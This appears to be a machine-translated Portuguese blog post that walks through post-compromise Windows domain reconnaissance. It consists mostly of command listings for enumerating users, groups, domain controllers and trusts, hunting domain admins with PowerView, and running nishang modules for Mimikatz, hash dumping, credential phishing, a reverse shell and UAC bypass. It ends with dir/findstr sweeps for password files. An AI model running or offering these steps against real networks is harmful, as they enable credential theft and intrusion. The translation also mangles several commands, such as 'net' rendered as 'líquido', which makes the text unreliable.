minhas informações de contato
Correspondência[email protected]
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Quatro situações:
1. Usuário local: usuário
2. Usuário administrador local: desabilitado na versão inicial, disponível apenas no servidor
3. Usuários dentro do domínio
4. Administrador de domínio
Usuários locais comuns não podem obter informações de domínio
Os usuários administradores locais podem escalar diretamente seus direitos aos usuários do sistema (usuários dentro do domínio) e obter informações dentro do domínio.
1. Determine se o domínio existe:
1. Verifique o domínio: ipconfig/all ou systeminfo ou net config workstation
ipconfig /all: Domínio encontrado: hack.com
systeminfo: O domínio encontrado é: hack.com
2. Visualize o host DNS do domínio: nome de domínio nslookup (hack.com)
3.Tempo líquido/domínio três situações
O domínio existe, mas o usuário atual não é um usuário do domínio
Existe um domínio e o usuário atual é um usuário do domínio
O ambiente de rede atual é um grupo de trabalho e não existe nenhum domínio
1.net view: Exibir lista de domínios, lista de computadores, recursos compartilhados de computadores especificados: net view (exibir lista de computadores) net view \computer (visualizar computador compartilhado especificado)
net view /domain:nome de domínio (hack) (exibir lista de computadores)
2.net user para visualizar usuários locais: net user /domain para visualizar quantos usuários estão no domínio
Adicionar usuário: nome de usuário líquido (admin) senha (123)/adicionar
Uso 3.net: Conecte o computador ou desconecte o computador do recurso compartilhado, exiba as informações de conexão do computador
4. horário da rede: use o horário para sincronizar computadores ou domínios: horário da rede \ horário da rede do computador / domínio
5.net start: inicia o serviço ou exibe o serviço iniciado: net start service
6.net pause: pausa o serviço em execução: serviço net pause
7.net continue: reative o serviço: net continue service
8.net stop: Interromper o serviço Windows NT/2000/2003: serviço net stop
9.net share: excluir, criar ou exibir recursos compartilhados
Sessão 10.net: Liste ou desconecte as sessões do computador local e dos clientes conectados a ele:
net session //computador (identifica o computador a ser listado ou conectado)
net session //computador deletar (desconectar a sessão do computador especificado)
11.net localgroup Ver grupo de computadores (aplicável apenas ao local): net localgroup nome de usuário
Usuário de domínio: nome de usuário/domínio do grupo local líquido
12.net group consulta o nome do grupo no domínio (aplicável apenas a controladores de domínio): net group /domain
13.net config exibe os serviços configuráveis atualmente em execução ou exibe e altera a configuração de um serviço (localmente):
net config (exibe serviços em execução) net config services (exibe uma lista de serviços)
14.computador net Adicione ou exclua computadores do banco de dados do domínio:
net computer \computername /add ou /del (adiciona ou exclui computadores do domínio de login)
Se aparecer "A lista de servidores deste grupo de trabalho não está disponível no momento", habilite os serviços: Servidor, Estação de Trabalho, Navegador do computador e feche o firewall.
Ver domínio: ipconfig/all ou systeminfo ou net config workstation
Veja o host DNS do domínio: nome de domínio nslookup (hack.com)
Domínio de consulta: net view /domínio
Consulte todos os computadores no domínio: net view /domínio:nome do domínio
Consulte a lista de todos os grupos de usuários no domínio: net group /domain
Consulte a lista de computadores de todos os membros do domínio: grupo net "computadores de domínio" /domínio
Consulte as informações de senha no domínio: net accounts /domain
Obtenha informações de confiança do domínio: nltest /domain_trusts
Veja o nome do controlador de domínio: nltest /DCLIST:hack
Veja o nome da máquina, encontre o IP, ping/nslookup: ping/nslookup nome do controlador de domínio
Às vezes, o ping está desabilitado. Use nslookup aqui.
Ver nome do host do controlador de domínio: nslookup ‐type=SRV _ldap._tcp
Verifique a hora atual: net time /domain
Veja o grupo de controladores de domínio: net group "Domain Controllers" /domain
1. Consulte informações do usuário no domínio: net user /domain
2. Visualizar usuários locais: conta de usuário wmic obter nome Usuários de domínio: conta de usuário wmic obter domínio, nome
Usuário local:
Usuário do domínio:
3. Verifique os usuários existentes: usuário dsquery (às vezes pode não ser executado e só pode ser executado na máquina do servidor)
4. Consulte o grupo de usuários administradores locais: administradores de grupo local líquido
5. Consulte usuários administradores de domínio: grupo de rede "administradores de domínio" /domínio
6. Consulte o grupo de usuários administradores de domínio: net group "Enterprise Admins" /domain
Duas ferramentas são necessárias aqui
Primeiro carregue a ferramenta no servidor e depois execute-a
1.PVEFindADUser: PVEFindADUser.exe -current (observe o caminho) Esta ferramenta pode verificar quais usuários estão logados no computador, permitindo-nos encontrar o administrador do domínio
2. script powerView:
powershell.exe ‐exec bypass ‐comando "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"
Verifique as permissões primeiro: Get-ExecutionPolicy
Altere a política em execução: Set-ExecutionPolicy Unrestricted (somente permissões irrestritas podem executar pow)
ferramenta nishang (há um link para download no artigo anterior):
Depois de colocá-lo no diretório CS, importe-o diretamente: powershell-import nishang/nishang.psm1
Execute: comando powershell
Alguns comandos comumente usados:
Check-VM: verifique se o host é uma máquina virtual
Invoke-CredentialsPhish: engane o usuário para que ele insira sua senha
Get-WLAN-Keys: informações de wifi
Invoke-Mimikatz: pegue senhas
Get-PassHashes: Obtenha hash
Get-PassHints: Obtenha informações de dica de senha do usuário
Invoke-PowerShellTcp: shell de recuperação
Invocar-PsUACme: ignorar o UAC
Remove-Update: Remova o patch
Obter informações: informações locais
Exemplo: PowerShell Check-VM
1. Colete vários arquivos confidenciais em diretórios designados
diretório /a /s /bd:"*.txt"
diretório /a /s /b C:"*.xlsx"
dir /a /s /bd:"*.md"
diretório /a /s /bd:"*.sql"
dir /a /s /bd:"*.pdf"
dir /a /s /bd:"*.docx"
dir /a /s /bd:"*.doc"
dir /a /s /bd:"*conf*"
dir /a /s /bd:"*bak*"
dir /a /s /bd:"*senha*"
dir /a /s /bd:"*senha*"
dir /a /s /bd:"*login*"
dir /a /s /bd:"*usuário*"
2. Colete várias senhas de contas de arquivos no diretório especificado
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si senha do usuário *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si senha *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si usuário *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Exemplo: dir /a /s /bd:"*.txt"